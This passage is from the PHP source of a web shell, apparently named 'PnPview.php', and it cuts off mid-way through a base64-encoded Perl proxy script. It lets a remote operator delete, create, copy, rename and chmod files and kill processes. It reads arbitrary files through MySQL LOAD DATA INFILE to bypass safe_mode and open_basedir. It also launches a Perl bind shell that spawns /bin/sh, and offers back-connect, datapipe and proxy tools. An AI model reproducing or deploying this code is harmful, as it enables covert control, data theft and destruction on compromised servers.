echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
(All files must be writable)<br>
<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
";
echo $copyr;
exit;
}
$mkdir=$_GET['mkdir'];
if($mkdir){
print "<br><b>Create Folder in $d :</b><br><br>
<form method=post>
New folder name:<br>
<input name=dir_n size=30>
</form><br>
";
if($_POST['dir_n']){
mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
print "<b><font color=green>Directory created success!</font></b>";
}
print $copyr;
die;
}
$mkfile=$_GET['mkfile'];
if($mkfile){
print "<br><b>Create file in $d :</b><br><br>
<form method=post>
File name:<br>
(example: hello.txt , hello.php)<br>
<input name=file_n size=30>
</form><br>
";
if($_POST['file_n']){
$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
fwrite($fp,"");
print "<b><font color=green>File created success!</font></b>";
}
print $copyr;
die;
}
$ps_table=$_GET['ps_table'];
if($ps_table){
if($_POST['kill_p']){
exec("kill -9 ".$_POST['kill_p']);
}
$str=`ps aux`;
preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
print "<br><b>PS Table :: Fast kill program<br>
(p.s: Tested on Linux slackware 10.0)<br>
<br></b>";
print "<center><table border=1>";
for($i=0; $i<count($matches[3]); $i++){
$expl=explode(" ",$matches[0][$i]);
print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
}
print "</table></center><br><br>";
unset($str);
print $copyr;
die;
}$read_file_safe_mode=$_GET['read_file_safe_mode'];
if($read_file_safe_mode){
if(!isset($_POST['l'])){$_POST['l']="root";}
print "<br>
Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
<form method=post>
<table>
<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
(example: /etc/hosts)<br>
<input name=read_file size=45><br>
<input type=submit value='Show content'>
</form>
<br>";
if($_POST['read_file']){
$read_file=$_POST['read_file'];
@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
$query = "SELECT * FROM tmp_file";
$result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
print "<b>File content</b>:<br><br>";
for($i=0;$i<mysql_num_fields($result);$i++){
$name=mysql_field_name($result,$i);}
while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
foreach ($line as $key =>$col_value) {
print htmlspecialchars($col_value)."<br>";}}
mysql_free_result($result);
mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
}
print $copyr;
die;
}
$wich_f=$_GET['wich_f'];
$delete=$_GET['delete'];
$del_f=$_GET['del_f'];
$chmod=$_GET['chmod'];
$ccopy_to=$_GET['ccopy_to'];
if(@$_GET['del_f']){
if(!isset($delete)){
print "<font color=red>Delete this file?</font><br>
<b>$d/$wich_f<br><br></b>
<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
";}
if($delete==1){
unlink($d."/".$del_f);
print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
<br><b> <a href='$php_self?d=$d'># BACK</a>
";
}
echo $copyr;
exit;
}
if($ccopy_to){
$wich_f=$_POST['wich_f'];
$to_f=$_POST['to_f'];
print "<font color=green>Copy file:<br>
$d/$ccopy_to</font><br>
<br>
<form method=post>
File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
To:<br><input name=to_f size=100 value='$d/PnP_$ccopy_to'><br><br>
<input type=submit value=Copy></form><br><br>
";
if($to_f){
@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
print "<font color=green><b>Copy success!!!</b></font><br>";
}
echo $copyr;
exit;
}
if(@$_GET['chmod']){
$perms = @fileperms($d."/".$wich_f);
print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
<br><center>This file chmod is</b> ";
print perm($perms);
print "</center>
<br>";
$chmd=<<<HTML
<script>
<!--
function do_chmod(user) {
var field4 = user + "4";
var field2 = user + "2";
var field1 = user + "1";
var total = "t_" + user;
var symbolic = "sym_" + user;
var number = 0;
var sym_string = "";
if (document.chmod[field4].checked == true) { number += 4; }
if (document.chmod[field2].checked == true) { number += 2; }
if (document.chmod[field1].checked == true) { number += 1; }
if (document.chmod[field4].checked == true) {
sym_string += "r";
} else {
sym_string += "-";
}
if (document.chmod[field2].checked == true) {
sym_string += "w";
} else {
sym_string += "-";
}
if (document.chmod[field1].checked == true) {
sym_string += "x";
} else {
sym_string += "-";
}
if (number == 0) { number = ""; }
document.chmod[total].value = number;
document.chmod[symbolic].value = sym_string;
document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
}
//-->
</script>
<form name="chmod" method=post>
<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
<tr bgcolor="gray">
<td align="left"><b>Permission</b></td>
<td align="center"><b>Owner</b></td>
<td align="center"><b>Group</b></td>
<td align="center"><b>Other</b></td>
<td bgcolor="#dddddd" rowspan="4"> </td>
</tr><tr bgcolor="#dddddd">
<td align="left" nowrap><b>Read</b></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
</tr><tr bgcolor="#dddddd">
<td align="left" nowrap><b>Write</b></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
</tr><tr bgcolor="#dddddd">
<td align="left" nowrap><b>Execute</b></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
</tr><tr bgcolor="#dddddd">
<td align="right" nowrap>Octal:</td>
<td align="center"><input type="text" name="t_owner" value="" size="1"></td>
<td align="center"><input type="text" name="t_group" value="" size="1"></td>
<td align="center"><input type="text" name="t_other" value="" size="1"></td>
<td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
</tr><tr bgcolor="#dddddd">
<td align="right" nowrap>Symbolic:</td>
<td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
<td align="center"><input type="text" name="sym_group" value="" size="3"></td>
<td align="center"><input type="text" name="sym_other" value="" size="3"></td>
<td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
</tr>
</table></td></tr></table></p>
HTML;
print "<center>".$chmd."
<b>$d/$wich_f</b><br><br>
<input type=submit value=CHMOD></form>
</center>
</form>
";
$t_total=$_POST['t_total'];
if($t_total){
chmod($d."/".$wich_f,$t_total);
print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
print "<a href='$php_self?d=$d'># BACK</a><br><br>";
}
echo $copyr;
exit;
}
# rename
if(@$_GET['rename']){
print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
<center>
<form method=post>
<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
<input name=rto size=40 value='$wich_f'><br><br>
<input type=submit value=RENAME>
</form>
";
@$rto=$_POST['rto'];
if($rto){
$fr1=$d."/".$wich_f;
$fr1=str_replace("//","/",$fr1);
$to1=$d."/".$rto;
$to1=str_replace("//","/",$to1);
rename($fr1,$to1);
print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
}
echo $copyr;
exit;
}
if(@$_GET['deldir']){
@$dir=$_GET['dir'];
function deldir($dir)
{
$handle = @opendir($dir);
while (false!==($ff = @readdir($handle))){
if($ff != "." && $ff != ".."){
if(@is_dir("$dir/$ff")){
deldir("$dir/$ff");
}else{
@unlink("$dir/$ff");
}}}
@closedir($handle);
if(@rmdir($dir)){
@$success = true;}
return @$success;
}
$dir=@$dir;
deldir($dir);
$rback=$_GET['rback'];
@$rback=explode("/",$rback);
$crb=count($rback);
for($i=0; $i<$crb-1; $i++){
@$x.=$rback[$i]."/";
}
echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
echo $copyr;
exit;}
if(@$_GET['t']=="tools"){
# unix
if($os=="unix"){
print "
<center><br>
<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run PnPview.php again.</b><br></font>
<table border=1>
<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
</table>
</center>
<br><Br>
";
}
if($_POST['perl_bd']){
$port=$_POST['port'];
$perl_bd_scp = "
use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
close X;}}";
if(is_writable("/tmp")){
$fp=fopen("/tmp/PnP_perl_bd.pl","w");
fwrite($fp,"$perl_bd_scp");
passthru("nohup perl /tmp/PnP_perl_bd.pl &");
unlink("/tmp/PnP_perl_bd.pl");
}else{
if(is_writable(".")){
mkdir(".PnP_bd_tmp");
$fp=fopen(".PnP_bd_tmp/PnP_perl_bd.pl","w");
fwrite($fp,"$perl_bd_scp");
passthru("nohup perl .PnP_bd_tmp/PnP_perl_bd.pl &");
unlink(".PnP_bd_tmp/PnP_perl_bd.pl");
rmdir(".PnP_bd_tmp");
}
}
$show_ps="1";
}
if($_POST['perl_proxy']){
$port=$_POST['port'];
$perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIG